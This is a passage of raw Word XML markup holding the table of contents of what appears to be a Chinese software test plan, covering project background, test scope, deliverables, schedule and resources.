          <w:pgMar w:top="1440" w:right="1440" w:bottom="1440" w:left="1440" w:header="720" w:footer="720" w:gutter="0"/>
          <w:cols w:space="720"/>
          <w:titlePg/>
          <w:docGrid w:linePitch="286"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="45BB7323" w14:textId="6BB52E9B" w:rsidR="00F422B4" w:rsidRDefault="00F422B4" w:rsidP="00F422B4">
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:spacing w:before="312"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:cs="Arial"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:cs="Arial" w:hint="eastAsia"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>目录</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26E5367C" w14:textId="77777777" w:rsidR="00A25348" w:rsidRDefault="00A912E4">
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:spacing w:before="312"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:noProof/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:cs="Arial"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:cs="Arial"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:cs="Arial" w:hint="eastAsia"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:instrText>TOC \o "1-2" \h \z \u</w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:cs="Arial"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:cs="Arial"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:hyperlink w:anchor="_Toc36630283" w:history="1">
        <w:r w:rsidR="00A25348" w:rsidRPr="009B34A2">
          <w:rPr>
            <w:rStyle w:val="af3"/>
            <w:noProof/>
            <w14:scene3d>
              <w14:camera w14:prst="orthographicFront"/>
              <w14:lightRig w14:rig="threePt" w14:dir="t">
                <w14:rot w14:lat="0" w14:lon="0" w14:rev="0"/>
              </w14:lightRig>
            </w14:scene3d>
          </w:rPr>
          <w:t>1.</w:t>
        </w:r>
        <w:r w:rsidR="00A25348" w:rsidRPr="009B34A2">
          <w:rPr>
            <w:rStyle w:val="af3"/>
            <w:rFonts w:hint="eastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
        <w:r w:rsidR="00A25348" w:rsidRPr="009B34A2">
          <w:rPr>
            <w:rStyle w:val="af3"/>
            <w:rFonts w:hint="eastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t>项目简介部分</w:t>
        </w:r>
        <w:r w:rsidR="00A25348">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00A25348">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00A25348">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc36630283 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00A25348">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00A25348">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00A25348">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>4</w:t>
        </w:r>
        <w:r w:rsidR="00A25348">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4267FEE0" w14:textId="77777777" w:rsidR="00A25348" w:rsidRDefault="00A25348">
      <w:pPr>
        <w:pStyle w:val="20"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="8302"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:smallCaps w:val="0"/>
          <w:noProof/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc36630284" w:history="1">
        <w:r w:rsidRPr="009B34A2">
          <w:rPr>
            <w:rStyle w:val="af3"/>
            <w:noProof/>
            <w:lang w:val="en-GB"/>
          </w:rPr>
          <w:t>1.1.</w:t>
        </w:r>
        <w:r w:rsidRPr="009B34A2">
          <w:rPr>
            <w:rStyle w:val="af3"/>
            <w:rFonts w:hint="eastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
        <w:r w:rsidRPr="009B34A2">
          <w:rPr>
            <w:rStyle w:val="af3"/>
            <w:rFonts w:hint="eastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t>文档编写目的</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc36630284 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>4</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2AA9AA52" w14:textId="77777777" w:rsidR="00A25348" w:rsidRDefault="00A25348">
      <w:pPr>
        <w:pStyle w:val="20"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="8302"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:smallCaps w:val="0"/>
          <w:noProof/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc36630285" w:history="1">
        <w:r w:rsidRPr="009B34A2">
          <w:rPr>
            <w:rStyle w:val="af3"/>
            <w:noProof/>
            <w:lang w:val="en-GB"/>
          </w:rPr>
          <w:t>1.2.</w:t>
        </w:r>
        <w:r w:rsidRPr="009B34A2">
          <w:rPr>
            <w:rStyle w:val="af3"/>
            <w:rFonts w:hint="eastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
        <w:r w:rsidRPr="009B34A2">
          <w:rPr>
            <w:rStyle w:val="af3"/>
            <w:rFonts w:hint="eastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t>名词解释</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc36630285 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>4</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="49F7E88D" w14:textId="77777777" w:rsidR="00A25348" w:rsidRDefault="00A25348">
      <w:pPr>
        <w:pStyle w:val="20"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="8302"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:smallCaps w:val="0"/>
          <w:noProof/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc36630286" w:history="1">
        <w:r w:rsidRPr="009B34A2">
          <w:rPr>
            <w:rStyle w:val="af3"/>
            <w:noProof/>
            <w:lang w:val="en-GB"/>
          </w:rPr>
          <w:t>1.3.</w:t>
        </w:r>
        <w:r w:rsidRPr="009B34A2">
          <w:rPr>
            <w:rStyle w:val="af3"/>
            <w:rFonts w:hint="eastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
        <w:r w:rsidRPr="009B34A2">
          <w:rPr>
            <w:rStyle w:val="af3"/>
            <w:rFonts w:hint="eastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t>测试项目背景描述</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc36630286 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>4</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="46A13E1E" w14:textId="77777777" w:rsidR="00A25348" w:rsidRDefault="00A25348">
      <w:pPr>
        <w:pStyle w:val="20"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="8302"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:smallCaps w:val="0"/>
          <w:noProof/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc36630287" w:history="1">
        <w:r w:rsidRPr="009B34A2">
          <w:rPr>
            <w:rStyle w:val="af3"/>
            <w:noProof/>
            <w:lang w:val="en-GB"/>
          </w:rPr>
          <w:t>1.4.</w:t>
        </w:r>
        <w:r w:rsidRPr="009B34A2">
          <w:rPr>
            <w:rStyle w:val="af3"/>
            <w:rFonts w:hint="eastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
        <w:r w:rsidRPr="009B34A2">
          <w:rPr>
            <w:rStyle w:val="af3"/>
            <w:rFonts w:hint="eastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t>测试工作内容和范围</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc36630287 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>4</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="32D8D705" w14:textId="77777777" w:rsidR="00A25348" w:rsidRDefault="00A25348">
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:spacing w:before="312"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:noProof/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc36630288" w:history="1">
        <w:r w:rsidRPr="009B34A2">
          <w:rPr>
            <w:rStyle w:val="af3"/>
            <w:noProof/>
            <w14:scene3d>
              <w14:camera w14:prst="orthographicFront"/>
              <w14:lightRig w14:rig="threePt" w14:dir="t">
                <w14:rot w14:lat="0" w14:lon="0" w14:rev="0"/>
              </w14:lightRig>
            </w14:scene3d>
          </w:rPr>
          <w:t>2.</w:t>
        </w:r>
        <w:r w:rsidRPr="009B34A2">
          <w:rPr>
            <w:rStyle w:val="af3"/>
            <w:rFonts w:hint="eastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
        <w:r w:rsidRPr="009B34A2">
          <w:rPr>
            <w:rStyle w:val="af3"/>
            <w:rFonts w:hint="eastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t>测试文档</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc36630288 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>5</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="43BDB7A7" w14:textId="77777777" w:rsidR="00A25348" w:rsidRDefault="00A25348">
      <w:pPr>
        <w:pStyle w:val="20"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="8302"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:smallCaps w:val="0"/>
          <w:noProof/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc36630289" w:history="1">
        <w:r w:rsidRPr="009B34A2">
          <w:rPr>
            <w:rStyle w:val="af3"/>
            <w:noProof/>
            <w:lang w:val="en-GB"/>
          </w:rPr>
          <w:t>2.1.</w:t>
        </w:r>
        <w:r w:rsidRPr="009B34A2">
          <w:rPr>
            <w:rStyle w:val="af3"/>
            <w:rFonts w:hint="eastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
        <w:r w:rsidRPr="009B34A2">
          <w:rPr>
            <w:rStyle w:val="af3"/>
            <w:rFonts w:hint="eastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t>测试所需参考文档</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc36630289 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>5</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="603B5D87" w14:textId="77777777" w:rsidR="00A25348" w:rsidRDefault="00A25348">
      <w:pPr>
        <w:pStyle w:val="20"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="8302"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:smallCaps w:val="0"/>
          <w:noProof/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc36630290" w:history="1">
        <w:r w:rsidRPr="009B34A2">
          <w:rPr>
            <w:rStyle w:val="af3"/>
            <w:noProof/>
            <w:lang w:val="en-GB"/>
          </w:rPr>
          <w:t>2.2.</w:t>
        </w:r>
        <w:r w:rsidRPr="009B34A2">
          <w:rPr>
            <w:rStyle w:val="af3"/>
            <w:rFonts w:hint="eastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
        <w:r w:rsidRPr="009B34A2">
          <w:rPr>
            <w:rStyle w:val="af3"/>
            <w:rFonts w:hint="eastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t>测试需提交文档</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc36630290 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>5</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="607FF868" w14:textId="77777777" w:rsidR="00A25348" w:rsidRDefault="00A25348">
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:spacing w:before="312"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:noProof/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc36630291" w:history="1">
        <w:r w:rsidRPr="009B34A2">
          <w:rPr>
            <w:rStyle w:val="af3"/>
            <w:noProof/>
            <w14:scene3d>
              <w14:camera w14:prst="orthographicFront"/>
              <w14:lightRig w14:rig="threePt" w14:dir="t">
                <w14:rot w14:lat="0" w14:lon="0" w14:rev="0"/>
              </w14:lightRig>
            </w14:scene3d>
          </w:rPr>
          <w:t>3.</w:t>
        </w:r>
        <w:r w:rsidRPr="009B34A2">
          <w:rPr>
            <w:rStyle w:val="af3"/>
            <w:rFonts w:hint="eastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
        <w:r w:rsidRPr="009B34A2">
          <w:rPr>
            <w:rStyle w:val="af3"/>
            <w:rFonts w:hint="eastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t>测试安排和计划</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc36630291 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>7</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="28698AFE" w14:textId="77777777" w:rsidR="00A25348" w:rsidRDefault="00A25348">
      <w:pPr>
        <w:pStyle w:val="20"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="8302"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:smallCaps w:val="0"/>
          <w:noProof/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc36630292" w:history="1">
        <w:r w:rsidRPr="009B34A2">
          <w:rPr>
            <w:rStyle w:val="af3"/>
            <w:noProof/>
            <w:lang w:val="en-GB"/>
          </w:rPr>
          <w:t>3.1.</w:t>
        </w:r>
        <w:r w:rsidRPr="009B34A2">
          <w:rPr>
            <w:rStyle w:val="af3"/>
            <w:rFonts w:hint="eastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
        <w:r w:rsidRPr="009B34A2">
          <w:rPr>
            <w:rStyle w:val="af3"/>
            <w:rFonts w:hint="eastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t>测试难点和重点</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc36630292 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>7</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="74060A9C" w14:textId="77777777" w:rsidR="00A25348" w:rsidRDefault="00A25348">
      <w:pPr>
        <w:pStyle w:val="20"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="8302"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:smallCaps w:val="0"/>
          <w:noProof/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc36630293" w:history="1">
        <w:r w:rsidRPr="009B34A2">
          <w:rPr>
            <w:rStyle w:val="af3"/>
            <w:noProof/>
            <w:lang w:val="en-GB"/>
          </w:rPr>
          <w:t>3.2.</w:t>
        </w:r>
        <w:r w:rsidRPr="009B34A2">
          <w:rPr>
            <w:rStyle w:val="af3"/>
            <w:rFonts w:hint="eastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
        <w:r w:rsidRPr="009B34A2">
          <w:rPr>
            <w:rStyle w:val="af3"/>
            <w:rFonts w:hint="eastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t>项目整体计划</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc36630293 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>7</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="26D208CC" w14:textId="77777777" w:rsidR="00A25348" w:rsidRDefault="00A25348">
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:spacing w:before="312"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:noProof/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc36630294" w:history="1">
        <w:r w:rsidRPr="009B34A2">
          <w:rPr>
            <w:rStyle w:val="af3"/>
            <w:noProof/>
            <w14:scene3d>
              <w14:camera w14:prst="orthographicFront"/>
              <w14:lightRig w14:rig="threePt" w14:dir="t">
                <w14:rot w14:lat="0" w14:lon="0" w14:rev="0"/>
              </w14:lightRig>
            </w14:scene3d>
          </w:rPr>
          <w:t>4.</w:t>
        </w:r>
        <w:r w:rsidRPr="009B34A2">
          <w:rPr>
            <w:rStyle w:val="af3"/>
            <w:rFonts w:hint="eastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
        <w:r w:rsidRPr="009B34A2">
          <w:rPr>
            <w:rStyle w:val="af3"/>
            <w:rFonts w:hint="eastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t>测试资源安排</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
